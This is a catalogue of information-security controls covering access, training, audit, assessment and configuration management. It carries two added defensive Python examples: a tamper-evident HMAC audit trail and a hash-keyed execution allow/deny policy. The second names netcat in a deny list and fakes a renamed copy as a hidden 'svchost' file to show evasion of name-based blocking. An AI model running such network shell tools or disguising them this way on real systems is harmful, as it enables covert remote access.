The organization: a) Identifies specific user actions that can be performed on the information system without identification or authentication; and b) Documents and provides supporting rationale in the security plan for the information system, user actions not requiring identification and authentication.
AC-14(1) Permitted Actions Without Identification Or Authentication X X X X X X Yes Yes P1
The organization permits actions to be performed without identification and authentication only to the extent necessary to accomplish mission/business objectives.
AC-17 Remote Access X X X X X X X X X Yes Yes P1
The organization: a) Documents allowed methods of remote access to the information system; b) Establishes usage restrictions and implementation guidance for each allowed remote access method; c) Monitors for unauthorized remote access to the information system; d) Authorizes remote access to the information system prior to connection; and e) Enforces requirements for remote connections to the information system.
AC-17(1) Remote Access X X X X X X X X Yes Yes P1
The organization employs automated mechanisms to facilitate the monitoring and control of remote access methods.
AC-17(2) Remote Access X X X X X X X X Yes Yes P1
The organization uses cryptography to protect the confidentiality and integrity of remote access sessions.
AC-17(3) Remote Access X X X X X X X X Yes Yes P1
The information system routes all remote accesses through a limited number of managed access control points.
AC-17(4) Remote Access X X X X X X X X Yes Yes P1
The organization authorizes the execution of privileged commands and access to security-relevant information via remote access only for compelling operational needs and documents the rationale for such access in the security plan for the information system.
AC-17(5) Remote Access X X X X X X X X Yes Yes P1
The organization monitors for unauthorized remote connections to the information system [Assignment: organization-defined frequency], and takes appropriate action if an unauthorized connection is discovered.
AC-17(6) Remote Access X X X Yes Yes P0
The organization ensures that users protect information about remote access mechanisms from unauthorized use and disclosure.
AC-17(7) Remote Access X X X X X X X X Yes Yes P1
The organization ensures that remote sessions for accessing [Assignment: organization-defined list of security functions and security-relevant information] employ [Assignment: organization-defined additional security measures] and are audited.
AC-17(8) Remote Access X X X X X X X X Yes Yes P1
The organization disables [Assignment: organization-defined networking protocols within the information system deemed to be nonsecure] except for explicitly identified components in support of specific operational requirements.
AC-18 Wireless Access Restrictions X X X X X X X X X No No P1
The organization: a) Establishes usage restrictions and implementation guidance for wireless access; b) Monitors for unauthorized wireless access to the information system; c) Authorizes wireless access to the information system prior to connection; and d) Enforces requirements for wireless connections to the information system.
AC-18(1) Wireless Access Restrictions X X X X X X X X No No P1
The information system protects wireless access to the system using authentication and encryption.
AC-18(2) Wireless Access Restrictions X X X X X X X No No P0
The organization monitors for unauthorized wireless connections to the information system, including scanning for unauthorized wireless access points [Assignment: organization-defined frequency], and takes appropriate action if an unauthorized connection is discovered.
AC-18(3) Wireless Access Restrictions X X X X X X No No P0
The organization disables, when not intended for use, wireless networking capabilities internally embedded within information system components prior to issuance and deployment.
AC-18(4) Wireless Access Restrictions X X X X X X X No No P0
The organization does not allow users to independently configure wireless networking capabilities.
AC-18(5) Wireless Access Restrictions X X X X X X X No No P0
The organization confines wireless communications to organization-controlled boundaries.
AC-19 Access Control For Mobile Devices X X X X X X X X X Yes Yes P1
The organization: a) Establishes usage restrictions and implementation guidance for organization-controlled mobile devices; b) Authorizes connection of mobile devices meeting organizational usage restrictions and implementation guidance to organizational information systems; c) Monitors for unauthorized connections of mobile devices to organizational information systems; d) Enforces requirements for the connection of mobile devices to organizational information systems; e) Disables information system functionality that provides the capability for automatic execution of code on mobile devices without user direction; f) Issues specially configured mobile devices to individuals traveling to locations that the organization deems to be of significant risk in accordance with organizational policies and procedures; and g) Applies [Assignment: organization-defined inspection and preventative measures] to mobile devices returning from locations that the organization deems to be of significant risk in accordance with organizational policies and procedures.
AC-19(1) Access Control For Mobile Devices X X X X X Yes Yes P1
The organization restricts the use of writable, removable media in organizational information systems.
AC-19(2) Access Control For Mobile Devices X X X X X X X X Yes Yes P1
The organization prohibits the use of personally owned, removable media in organizational information systems.
AC-19(3) Access Control For Mobile Devices X X X X X X X X Yes Yes P1
The organization prohibits the use of removable media in organizational information systems when the media has no identifiable owner.
AC-19(4) Access Control For Mobile Devices X X X Yes Yes P0
The organization: a) Prohibits the use of unclassified mobile devices in facilities containing information systems processing, storing, or transmitting classified information unless specifically permitted by the appropriate authorizing official(s); and b) Enforces the following restrictions on individuals permitted to use mobile devices in facilities containing information systems processing, storing, or transmitting classified information: 1) Connection of unclassified mobile devices to classified information systems is prohibited; 2) Connection of unclassified mobile devices to unclassified information systems requires approval from the appropriate authorizing official(s); 3) Use of internal or external modems or wireless interfaces within the mobile devices is prohibited; and 4) Mobile devices and the information stored on those devices are subject to random reviews/inspections by [Assignment: organization-defined security officials], and if classified information is found, the incident handling policy is followed.
AC-20 Use Of External Information Systems X X X X X X X X X No Yes P1
The organization establishes terms and conditions, consistent with any trust relationships established with other organizations owning, operating, and/or maintaining external information systems, allowing authorized individuals to: a) Access the information system from the external information systems; and b) Process, store, and/or transmit organization-controlled information using the external information systems.
AC-20(1) Use Of External Information Systems X X X X X X X X No No P1
The organization permits authorized individuals to use an external information system to access the information system or to process, store, or transmit organization-controlled information only when the organization: a) Can verify the implementation of required security controls on the external system as specified in the organization's information security policy and security plan; or b) Has approved information system connection or processing agreements with the organizational entity hosting the external information system.
AC-20(2) Use Of External Information Systems X X X X X No No P1
The organization limits the use of organization-controlled portable storage media by authorized individuals on external information systems.
AC-22 Publicly Accessible Content X X X X X X No No P2
The organization: a) Designates individuals authorized to post information onto an organizational information system that is publicly accessible; b) Trains authorized individuals to ensure that publicly accessible information does not contain nonpublic information; c) Reviews the proposed content of publicly accessible information for nonpublic information prior to posting onto the organizational information system; d) Reviews the content on the publicly accessible organizational information system for nonpublic information [Assignment: organization-defined frequency]; and e) Removes nonpublic information from the publicly accessible organizational information system, if discovered.
AT-1 Security Awareness And Training Policy And Procedures X X X X X X X X X X X X Yes Yes P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented security awareness and training policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the security awareness and training policy and associated security awareness and training controls.
AT-2 Security Awareness X X X X X X X X X X X X Yes Yes P1
The organization provides basic security awareness training to all information system users (including managers, senior executives, and contractors) as part of initial training for new users, when required by system changes, and [Assignment: organization-defined frequency] thereafter.
AT-3 Security Training X X X X X X X X X X X X Yes Yes P1
The organization provides role-based security-related training: (i) before authorizing access to the system or performing assigned duties; (ii) when required by system changes; and (iii) [Assignment: organization-defined frequency] thereafter.
AT-3(2) Security Training X X X X X X X X X Yes Yes P0
The organization provides employees with initial and [Assignment: organization-defined frequency] training in the employment and operation of physical security controls.
AT-4 Security Training Records X X X X X X X X X X X X Yes Yes P3
The organization: a) Documents and monitors individual information system security training activities including basic security awareness training and specific information system security training; and b) Retains individual training records for [Assignment: organization-defined time period].
AT-5 Contacts With Security Groups And Associations X X X X X X X X X Yes Yes P0
The organization establishes and institutionalizes contact with selected groups and associations within the security community: a) To facilitate ongoing security education and training for organizational personnel; b) To stay up to date with the latest recommended security practices, techniques, and technologies; and c) To share current security-related information including threats, vulnerabilities, and incidents.
AU-1 Audit And Accountability Policy And Procedures X X X X X X X X X X X X Yes Yes P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented audit and accountability policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the audit and accountability policy and associated audit and accountability controls.
AU-2 Auditable Events X X X X X X X X X Yes Yes P1
The organization: a) Determines, based on a risk assessment and mission/business needs, that the information system must be capable of auditing the following events: [Assignment: organization-defined list of auditable events]; b) Coordinates the security audit function with other organizational entities requiring audit-related information to enhance mutual support and to help guide the selection of auditable events; c) Provides a rationale for why the list of auditable events are deemed to be adequate to support after-the-fact investigations of security incidents; and d) Determines, based on current threat information and ongoing assessment of risk, that the following events are to be audited within the information system: [Assignment: organization-defined subset of the auditable events defined in AU-2 a. to be audited along with the frequency of (or situation requiring) auditing for each identified event].
AU-2(3) Auditable Events X X X X X X X X Yes Yes P1
The organization reviews and updates the list of auditable events [Assignment: organization-defined frequency].
AU-2(4) Auditable Events X X X X X X X X Yes Yes P1
The organization includes execution of privileged functions in the list of events to be audited by the information system.
AU-3 Content Of Audit Records X X X X X X X X X Yes Yes P1
The information system produces audit records that contain sufficient information to, at a minimum, establish what type of event occurred, when (date and time) the event occurred, where the event occurred, the source of the event, the outcome (success or failure) of the event, and the identity of any user/subject associated with the event.
AU-3(1) Content Of Audit Records X X X X X X X X Yes Yes P1
The information system includes [Assignment: organization-defined additional, more detailed information] in the audit records for audit events identified by type, location, or subject.
AU-3(2) Content Of Audit Records X X X X X X X Yes Yes P0
The organization centrally manages the content of audit records generated by [Assignment: organization-defined information system components].
AU-4 Audit Storage Capacity X X X X X X Yes Yes P1
The organization allocates audit record storage capacity and configures auditing to reduce the likelihood of such capacity being exceeded.
AU-5 Response To Audit Processing Failures X X X X X X No Yes P1
The information system: a) Alerts designated organizational officials in the event of an audit processing failure; and b) Takes the following additional actions: [Assignment: organization-defined actions to be taken (e.g., shut down information system, overwrite oldest audit records, stop generating audit records)].
AU-5(1) Response To Audit Processing Failures X X X X No Yes P1
The information system provides a warning when allocated audit record storage volume reaches [Assignment: organization-defined percentage] of maximum audit record storage capacity.
AU-5(2) Response To Audit Processing Failures X X X No Yes P1
The information system provides a real-time alert when the following audit failure events occur: [Assignment: organization-defined audit failure events requiring real-time alerts].
AU-6 Audit Review, Analysis, And Reporting X X X X X X X X X Yes Yes P1
The organization: a) Reviews and analyzes information system audit records [Assignment: organization-defined frequency] for indications of inappropriate or unusual activity, and reports findings to designated organizational officials; and b) Adjusts the level of audit review, analysis, and reporting within the information system when there is a change in risk to organizational operations, organizational assets, individuals, other organizations, or the Nation based on law enforcement information, intelligence information, or other credible sources of information.
AU-6(1) Audit Review, Analysis, And Reporting X X X X X No No P1
The information system integrates audit review, analysis, and reporting processes to support organizational processes for investigation and response to suspicious activities.
AU-6(2) Audit Review, Analysis, And Reporting - - - - - - - - -
[Withdrawn: Incorporated into SI-4].
AU-6(3) Audit Review, Analysis, And Reporting X X X X X X No Yes P1
The organization analyzes and correlates audit records across different repositories to gain organization-wide situational awareness.
AU-7 Audit Reduction And Report Generation X X X X X X No No P2
The information system provides an audit reduction and report generation capability.
AU-7(1) Audit Reduction And Report Generation X X X X X X No No P2
The information system provides the capability to automatically process audit records for events of interest based on selectable event criteria.
AU-8 Time Stamps X X X X X X Yes Yes P1
The information system uses internal system clocks to generate time stamps for audit records.
AU-8(1) Time Stamps X X X X X No No P1
The information system synchronizes internal information system clocks [Assignment: organization-defined frequency] with [Assignment: organization-defined authoritative time source].
AU-9 Protection Of Audit Information X X X X X X X X X No Yes P1
The information system protects audit information and audit tools from unauthorized access, modification, and deletion.
AU-9(1) Protection Of Audit Information
The information system produces audit records on hardware-enforced, write-once media.
AU-9(2) Protection Of Audit Information X X No Yes P0
The information system backs up audit records [Assignment: organization-defined frequency] onto a different system or media than the system being audited.
AU-9(3) Protection Of Audit Information X No Yes P1
The information system uses cryptographic mechanisms to protect the integrity of audit information and audit tools.
AU-9(4) Protection Of Audit Information X X X No Yes P0
The organization: a) Authorizes access to management of audit functionality to only a limited subset of privileged users; and b) Protects the audit records of non-local accesses to privileged accounts and the execution of privileged functions.
AU-10 Non-Repudiation X X X No Yes P1
The information system protects against an individual falsely denying having performed a particular action.
AU-10(5) Non-Repudiation X X No No P1
The organization employs [Selection: FIPS-validated; NSA-approved] cryptography to implement digital signatures.
AU-11 Audit Record Retention X X X X X X Yes Yes P3
The organization retains audit records for [Assignment: organization-defined time period consistent with records retention policy] to provide support for after-the-fact investigations of security incidents and to meet regulatory and organizational information retention requirements.
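AU-9(2), AU-9(3) and AU-12(1) together describe an audit trail whose integrity can be checked independently of the system that produced it. The block below is an added illustration, not code from the RMAIP or from any DOE system, of one way to meet that with standard-library HMAC-SHA256: each record's tag also covers the previous record's tag, so editing, deleting or reordering any record breaks every tag after it; the key and the tag of the newest record are assumed to live on a separate log collector (the AU-9(2) separation), which is what makes silent truncation of the newest records detectable; and time stamps are checked against an AU-12(1) ordering tolerance. The sample events, host names, key and tolerance are constructed for the example.

```python
"""Hash-chained, HMAC-sealed audit trail with an off-system head anchor.

Added illustration (not RMAIP or DOE code). Key, events and tolerance are
constructed for the example.
"""
import copy
import hashlib
import hmac
import json
from datetime import datetime, timedelta

GENESIS = "0" * 64  # anchor tag for the first record in the chain

# Constructed sample events with AU-3 style content; not data from any real system.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T08:00:00+00:00", "host": "app01", "user": "alice",
     "event": "login", "outcome": "success"},
    {"ts": "2024-05-01T08:00:05+00:00", "host": "app01", "user": "alice",
     "event": "sudo", "outcome": "success", "cmd": "/usr/bin/systemctl restart auditd"},
    {"ts": "2024-05-01T08:00:04+00:00", "host": "db01", "user": "svc_backup",
     "event": "login", "outcome": "failure"},  # 1 s behind app01: inside the AU-12(1) tolerance
    {"ts": "2024-05-01T08:01:00+00:00", "host": "app01", "user": "alice",
     "event": "logout", "outcome": "success"},
]


def canonical(record: dict) -> bytes:
    # Deterministic serialization so one record always yields one tag.
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


def seal(key: bytes, prev_tag: str, record: dict) -> dict:
    # The tag covers the previous tag too, so editing, removing or reordering
    # any earlier record invalidates every tag after it.
    mac = hmac.new(key, prev_tag.encode() + b"\n" + canonical(record), hashlib.sha256)
    return {"prev": prev_tag, "record": record, "tag": mac.hexdigest()}


def build_trail(key: bytes, events: list) -> list:
    trail, prev = [], GENESIS
    for ev in events:
        entry = seal(key, prev, ev)
        trail.append(entry)
        prev = entry["tag"]
    return trail


def verify_trail(key: bytes, trail: list, head_tag: str, tolerance_s: float = 5.0) -> tuple:
    """Return (True, "ok") or (False, reason).

    head_tag is the newest tag as recorded on a different system (AU-9(2));
    without it, silently dropping the newest records is undetectable.
    tolerance_s is the AU-12(1) ordering tolerance between components' clocks.
    """
    prev, newest_ts = GENESIS, None
    for i, entry in enumerate(trail):
        if entry["prev"] != prev:
            return False, f"chain break before record {i}"
        expected = seal(key, prev, entry["record"])["tag"]
        if not hmac.compare_digest(expected, entry["tag"]):
            return False, f"record {i} modified or tag forged"
        ts = datetime.fromisoformat(entry["record"]["ts"])
        if newest_ts is not None and ts < newest_ts - timedelta(seconds=tolerance_s):
            return False, f"record {i} time stamp out of tolerance"
        newest_ts = ts if newest_ts is None else max(newest_ts, ts)
        prev = entry["tag"]
    if not hmac.compare_digest(prev, head_tag):
        return False, "head tag mismatch: newest records missing"
    return True, "ok"


def tamper_scenarios(key: bytes) -> dict:
    """Verify an intact trail and three classic manipulations of it."""
    trail = build_trail(key, SAMPLE_EVENTS)
    head = trail[-1]["tag"]  # assumed to have been copied to the log collector
    results = {"intact": verify_trail(key, trail, head)}

    edited = copy.deepcopy(trail)
    edited[1]["record"]["cmd"] = "/usr/bin/id"  # rewrite the privileged command
    results["edited"] = verify_trail(key, edited, head)

    deleted = trail[:1] + trail[2:]  # remove the sudo record
    results["deleted"] = verify_trail(key, deleted, head)

    truncated = trail[:-1]  # drop the newest record
    results["truncated"] = verify_trail(key, truncated, head)
    return results


if __name__ == "__main__":
    key = b"hypothetical-collector-key"  # in production: from a KMS/HSM, never on the audited host
    for name, (ok, why) in tamper_scenarios(key).items():
        print(f"{name:9s} {'PASS' if ok else 'FAIL'}  {why}")
```

Two caveats a practitioner would want: a chain alone only proves that the records present are consistent with each other, so the head tag (or a periodic checkpoint of it) must be stored off the audited system for truncation to be caught; and an HMAC gives integrity, not non-repudiation, because anyone holding the key can produce valid tags. Where AU-10 applies, the per-record seal needs a digital signature under AU-10(5) rather than a shared key.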
AU-12 Audit Generation X X X X X X X X X X X X Yes Yes P1
The information system: a) Provides audit record generation capability for the list of auditable events defined in AU-2 at [Assignment: organization-defined information system components]; b) Allows designated organizational personnel to select which auditable events are to be audited by specific components of the system; and c) Generates audit records for the list of audited events defined in AU-2 with the content as defined in AU-3.
AU-12(1) Audit Generation X X Yes Yes P1
The information system compiles audit records from [Assignment: organization-defined information system components] into a system-wide (logical or physical) audit trail that is time-correlated to within [Assignment: organization-defined level of tolerance for relationship between time stamps of individual records in the audit trail].
AU-13 Monitoring For Information Disclosure
The organization monitors open source information for evidence of unauthorized exfiltration or disclosure of organizational information [Assignment: organization-defined frequency].
CA-1 Security Assessment And Authorization Policies And Procedures X X X X X X X X X X X X Yes Yes P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) Formal, documented security assessment and authorization policies that address purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the security assessment and authorization policies and associated security assessment and authorization controls.
CA-2 Security Assessments X X X X X X X X X X X X Yes Yes P2
The organization: a) Develops a security assessment plan that describes the scope of the assessment including: 1) Security controls and control enhancements under assessment; 2) Assessment procedures to be used to determine security control effectiveness; and 3) Assessment environment, assessment team, and assessment roles and responsibilities; b) Assesses the security controls in the information system [Assignment: organization-defined frequency] to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system; c) Produces a security assessment report that documents the results of the assessment; and d) Provides the results of the security control assessment, in writing, to the authorizing official or authorizing official designated representative.
CA-2(1) Security Assessments X X X X X X X X X X X Yes Yes P2
The organization employs an independent assessor or assessment team to conduct an assessment of the security controls in the information system.
CA-2(2) Security Assessments X X X X Yes Yes P2
The organization includes as part of security control assessments, [Assignment: organization-defined frequency], [Selection: announced; unannounced], [Selection: in-depth monitoring; malicious user testing; penetration testing; red team exercises; [Assignment: organization-defined other forms of security testing]].
CA-3 Information System Connections X X X X X X X X X No Yes P1
The organization: a) Authorizes connections from the information system to other information systems outside of the authorization boundary through the use of Interconnection Security Agreements; b) Documents, for each connection, the interface characteristics, security requirements, and the nature of the information communicated; and c) Monitors the information system connections on an ongoing basis verifying enforcement of security requirements.
CA-3(1) Information System Connections X X X No Yes P1
The organization prohibits the direct connection of an unclassified, national security system to an external network.
CA-3(2) Information System Connections X X No Yes P1
The organization prohibits the direct connection of a classified, national security system to an external network.
CA-5 Plan Of Action And Milestones X X X X X X X X X X X X Yes Yes P3
The organization: a) Develops a plan of action and milestones for the information system to document the organization’s planned remedial actions to correct weaknesses or deficiencies noted during the assessment of the security controls and to reduce or eliminate known vulnerabilities in the system; and b) Updates existing plan of action and milestones [Assignment: organization-defined frequency] based on the findings from security controls assessments, security impact analyses, and continuous monitoring activities.
CA-6 Security Authorization X X X X X X X X X X X X Yes Yes P3
The organization: a) Assigns a senior-level executive or manager to the role of authorizing official for the information system; b) Ensures that the authorizing official authorizes the information system for processing before commencing operations; and c) Updates the security authorization [Assignment: organization-defined frequency].
CA-7 Continuous Monitoring X X X X X X X X X X X X Yes Yes P3
The organization establishes a continuous monitoring strategy and implements a continuous monitoring program that includes: a) A configuration management process for the information system and its constituent components; b) A determination of the security impact of changes to the information system and environment of operation; c) Ongoing security control assessments in accordance with the organizational continuous monitoring strategy; and d) Reporting the security state of the information system to appropriate organizational officials [Assignment: organization-defined frequency].
CA-7(1) Continuous Monitoring X X X X X X X X X Yes Yes P3
The organization employs an independent assessor or assessment team to monitor the security controls in the information system on an ongoing basis.
CA-7(2) Continuous Monitoring X X X X X X X X X Yes Yes P3
The organization plans, schedules, and conducts assessments [Assignment: organization-defined frequency], [Selection: announced; unannounced], [Selection: in-depth monitoring; malicious user testing; penetration testing; red team exercises; [Assignment: organization-defined other forms of security assessment]] to ensure compliance with all vulnerability mitigation procedures.
CM-1 Configuration Management Policy And Procedures X X X X X X X X X Yes Yes P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented configuration management policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the configuration management policy and associated configuration management controls.
CM-2 Baseline Configuration X X X X X X Yes Yes P1
The organization develops, documents, and maintains under configuration control, a current baseline configuration of the information system.
CM-2(1) Baseline Configuration X X X X X Yes Yes P1
The organization reviews and updates the baseline configuration of the information system: a) [Assignment: organization-defined frequency]; b) When required due to [Assignment: organization-defined circumstances]; and c) As an integral part of information system component installations and upgrades.
CM-2(2) Baseline Configuration X X Yes No P1
The organization employs automated mechanisms to maintain an up-to-date, complete, accurate, and readily available baseline configuration of the information system.
CM-2(3) Baseline Configuration X X X X Yes Yes P1
The organization retains older versions of baseline configurations as deemed necessary to support rollback.
CM-2(4) Baseline Configuration X X
The organization: a) Develops and maintains [Assignment: organization-defined list of software programs not authorized to execute on the information system]; and b) Employs an allow-all, deny-by-exception authorization policy to identify software allowed to execute on the information system.
CM-2(5) Baseline Configuration X X X X Yes Yes P1
The organization: a) Develops and maintains [Assignment: organization-defined list of software programs authorized to execute on the information system]; and b) Employs a deny-all, permit-by-exception authorization policy to identify software allowed to execute on the information system.
CM-2(6) Baseline Configuration X Yes Yes P1
The organization maintains a baseline configuration for development and test environments that is managed separately from the operational baseline configuration.
CM-3 Configuration Change Control X X X X X Yes Yes P1
The organization: a) Determines the types of changes to the information system that are configuration controlled; b) Approves configuration-controlled changes to the system with explicit consideration for security impact analyses; c) Documents approved configuration-controlled changes to the system; d) Retains and reviews records of configuration-controlled changes to the system; e) Audits activities associated with configuration-controlled changes to the system; and f) Coordinates and provides oversight for configuration change control activities through [Assignment: organization-defined configuration change control element (e.g., committee, board)] that convenes [Selection (one or more): [Assignment: organization-defined frequency]; [Assignment: organization-defined configuration change conditions]].
CM-3(1) Configuration Change Control X X No No P1
The organization employs automated mechanisms to: a) Document proposed changes to the information system; b) Notify designated approval authorities; c) Highlight approvals that have not been received by [Assignment: organization-defined time period]; d) Inhibit change until designated approvals are received; and e) Document completed changes to the information system.
CM-3(2) Configuration Change Control X X X X Yes Yes P1
The organization tests, validates, and documents changes to the information system before implementing the changes on the operational system.
CM-3(3) Configuration Change Control
The organization employs automated mechanisms to implement changes to the current information system baseline and deploys the updated baseline across the installed base.
CM-3(4) Configuration Change Control X X X Yes Yes P1
The organization requires an information security representative to be a member of the [Assignment: organization-defined configuration change control element (e.g., committee, board)].
CM-4 Security Impact Analysis X X X X X X Yes Yes P2
The organization analyzes changes to the information system to determine potential security impacts prior to change implementation.
CM-4(1) Security Impact Analysis X X X Yes Yes P2
The organization analyzes new software in a separate test environment before installation in an operational environment, looking for security impacts due to flaws, weaknesses, incompatibility, or intentional malice.
CM-4(2) Security Impact Analysis X X X Yes Yes P2
The organization, after the information system is changed, checks the security functions to verify that the functions are implemented correctly, operating as intended, and producing the desired outcome with regard to meeting the security requirements for the system.
CM-5 Access Restrictions For Change X X X X X Yes Yes P1
The organization defines, documents, approves, and enforces physical and logical access restrictions associated with changes to the information system.
CM-5(1) Access Restrictions For Change X Yes Yes P1
The organization employs automated mechanisms to enforce access restrictions and support auditing of the enforcement actions.
CM-5(2) Access Restrictions For Change X X X X Yes Yes P1
The organization conducts audits of information system changes [Assignment: organization-defined frequency] and when indications so warrant to determine whether unauthorized changes have occurred.
CM-5(3) Access Restrictions For Change X X No No P1
The information system prevents the installation of [Assignment: organization-defined critical software programs] that are not signed with a certificate that is recognized and approved by the organization.
CM-5(5) Access Restrictions For Change X X X No Yes P1
The organization: a) Limits information system developer/integrator privileges to change hardware, software, and firmware components and system information directly within a production environment; and b) Reviews and reevaluates information system developer/integrator privileges [Assignment: organization-defined frequency].
CM-5(6) Access Restrictions For Change X X X Yes Yes P1
The organization limits privileges to change software resident within software libraries (including privileged programs).
CM-6 Configuration Settings X X X X X X Yes Yes P1
The organization: a) Establishes and documents mandatory configuration settings for information technology products employed within the information system using [Assignment: organization-defined security configuration checklists] that reflect the most restrictive mode consistent with operational requirements; b) Implements the configuration settings; c) Identifies, documents, and approves exceptions from the mandatory configuration settings for individual components within the information system based on explicit operational requirements; and d) Monitors and controls changes to the configuration settings in accordance with organizational policies and procedures.
CM-6(1) Configuration Settings X X X No Yes P1
The organization employs automated mechanisms to centrally manage, apply, and verify configuration settings.
CM-6(2) Configuration Settings X X No Yes P1
The organization employs automated mechanisms to respond to unauthorized changes to [Assignment: organization-defined configuration settings].
CM-6(3) Configuration Settings X X X X X Yes Yes P1
The organization incorporates detection of unauthorized, security-relevant configuration changes into the organization’s incident response capability to ensure that such detected events are tracked, monitored, corrected, and available for historical purposes.
CM-7 Least Functionality X X X X X X X X X Yes Yes P1
The organization configures the information system to provide only essential capabilities and specifically prohibits or restricts the use of the following functions, ports, protocols, and/or services: [Assignment: organization-defined list of prohibited or restricted functions, ports, protocols, and/or services].
CM-7(1) Least Functionality X X X X X X X X Yes Yes P1
The organization reviews the information system [Assignment: organization-defined frequency] to identify and eliminate unnecessary functions, ports, protocols, and/or services.
CM-7(2) Least Functionality X X X X X Yes Yes P1
The organization employs automated mechanisms to prevent program execution in accordance with [Selection (one or more): list of authorized software programs; list of unauthorized software programs; rules authorizing the terms and conditions of software program usage].
CM-7(3) Least Functionality X X X X X X Yes Yes P1
The organization ensures compliance with [Assignment: organization-defined registration requirements for ports, protocols, and services].
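CM-2(4), CM-2(5) and CM-7(2) describe the two execution-control models (allow-all with a deny list, and deny-all with a permit list) and the automated mechanism that enforces one of them. The block below is an added illustration, not code from the RMAIP or from any DOE system, of the decision logic behind such a mechanism. It keys both lists on the SHA-256 of the program's contents rather than its path, and runs the same set of programs through both models so the difference shows: the deny-by-exception policy still runs an unreviewed modified build, and a name-based deny list misses a renamed copy outright. The program files are constructed byte strings, not real binaries, and the class, function and path names are hypothetical.

```python
"""Hash-keyed execution policy: deny-by-exception versus permit-by-exception.

Added illustration (not RMAIP or DOE code). PROGRAMS holds constructed byte
strings standing in for executables; they are not real binaries.
"""
import hashlib

PROGRAMS = {
    "/usr/bin/approved-tool": b"\x7fELF approved-tool 1.2",
    "/usr/bin/nc": b"\x7fELF netcat",
    "/tmp/.cache/svchost": b"\x7fELF netcat",                    # nc copied under a new name
    "/opt/vendor/approved-tool": b"\x7fELF approved-tool 1.2 + patch",  # modified build, never reviewed
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


class ExecutionPolicy:
    """Decide whether a program may run, keyed by content hash rather than path.

    mode "deny-by-exception":   allow-all, block what is listed        (CM-2(4))
    mode "permit-by-exception": deny-all, run only what is listed      (CM-2(5), CM-7(2))
    """

    def __init__(self, mode: str, listed_digests: set):
        if mode not in ("deny-by-exception", "permit-by-exception"):
            raise ValueError(f"unknown mode {mode!r}")
        self.mode = mode
        self.listed = set(listed_digests)
        self.decisions = []  # (path, digest prefix, verdict), kept for after-the-fact review

    def decide(self, path: str, contents: bytes) -> bool:
        digest = sha256_hex(contents)
        listed = digest in self.listed
        allowed = (not listed) if self.mode == "deny-by-exception" else listed
        self.decisions.append((path, digest[:12], "ALLOW" if allowed else "DENY"))
        return allowed


def path_based_denied(path: str, denied_paths: set) -> bool:
    """The weak variant, a name-based block list; shown only for contrast."""
    return path in denied_paths


def run_scenarios() -> dict:
    """Run the same programs through both models; True means execution is permitted."""
    nc_hash = sha256_hex(PROGRAMS["/usr/bin/nc"])
    approved_hash = sha256_hex(PROGRAMS["/usr/bin/approved-tool"])
    deny_list = ExecutionPolicy("deny-by-exception", {nc_hash})
    allow_list = ExecutionPolicy("permit-by-exception", {approved_hash})
    renamed = "/tmp/.cache/svchost"
    modified = "/opt/vendor/approved-tool"
    return {
        # allow-all, deny-by-exception (CM-2(4))
        "deny_nc": deny_list.decide("/usr/bin/nc", PROGRAMS["/usr/bin/nc"]),
        "deny_renamed_nc": deny_list.decide(renamed, PROGRAMS[renamed]),   # same hash, still blocked
        "deny_modified": deny_list.decide(modified, PROGRAMS[modified]),   # unlisted, so it runs
        # deny-all, permit-by-exception (CM-2(5))
        "allow_approved": allow_list.decide("/usr/bin/approved-tool", PROGRAMS["/usr/bin/approved-tool"]),
        "allow_modified": allow_list.decide(modified, PROGRAMS[modified]),  # not the approved hash
        "allow_renamed_nc": allow_list.decide(renamed, PROGRAMS[renamed]),
        # a name-based block list does not see the renamed copy at all
        "path_block_renamed_nc": path_based_denied(renamed, {"/usr/bin/nc"}),
    }


if __name__ == "__main__":
    for name, permitted in run_scenarios().items():
        print(f"{name:24s} {'ALLOW' if permitted else 'DENY'}")
```

The practical consequence is the one CM-2(5) implies: only the permit-by-exception model blocks software that nobody has looked at. Hashing whole files also means the permit list must be regenerated at every patch, which is why a production mechanism usually keys on a publisher certificate as CM-5(3) describes, with per-file hashes reserved for programs that are not signed.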
CM-8 Information System Component Inventory X X X X X X Yes Yes P1
The organization develops, documents, and maintains an inventory of information system components that: a) Accurately reflects the current information system; b) Is consistent with the authorization boundary of the information system; c) Is at the level of granularity deemed necessary for tracking and reporting; d) Includes [Assignment: organization-defined information deemed necessary to achieve effective property accountability]; and e) Is available for review and audit by designated organizational officials.
CM-8(1) Information System Component Inventory X X X X X Yes Yes P1
The organization updates the inventory of information system components as an integral part of component installations, removals, and information system updates.
CM-8(2) Information System Component Inventory X X Yes Yes P1
The organization employs automated mechanisms to help maintain an up-to-date, complete, accurate, and readily available inventory of information system components.
CM-8(3) Information System Component Inventory X X Yes Yes P1
The organization: a) Employs automated mechanisms [Assignment: organization-defined frequency] to detect the addition of unauthorized components/devices into the information system; and b) Disables network access by such components/devices or notifies designated organizational officials.
CM-8(4) Information System Component Inventory X X X X Yes Yes P1
The organization includes in property accountability information for information system components, a means for identifying by [Selection (one or more): name; position; role] individuals responsible for administering those components.
CM-8(5) Information System Component Inventory X X X X X Yes Yes P1
The organization verifies that all components within the authorization boundary of the information system are either inventoried as a part of the system or recognized by another system as a component within that system.
